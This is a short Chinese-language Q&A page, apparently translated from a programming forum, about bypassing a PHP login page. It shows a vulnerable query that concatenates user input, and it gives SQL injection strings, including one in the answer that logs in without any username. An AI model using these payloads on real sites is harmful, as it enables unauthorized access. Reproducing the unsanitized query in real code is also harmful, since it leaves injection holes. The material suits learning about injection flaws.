绕过网站身份验证

时间:2014-11-14 22:45:23

标签: php passwords sql-injection

我有一个用PHP编写的非常基本的登录页面代码的一部分,我想要绕过没有任何登录。

 $req="select id from USERS where login='$login' and pwd='$pass'";
 $result = mysql_query($req);

如果我有一个用户的登录名,例如login1已经在数据库中。我只需要输入以下条目即可在不知道密码的情况下登录;我们称之为SQL注入:

 login="login1"
 password="' OR '1'='1'"

但是,我不知道如何在没有任何登录名或密码的情况下登录页面。

提前谢谢!

1 个答案:

答案 0 :(得分:0)

适用于login="' OR true ORDER BY RAND() LIMIT 1 /*"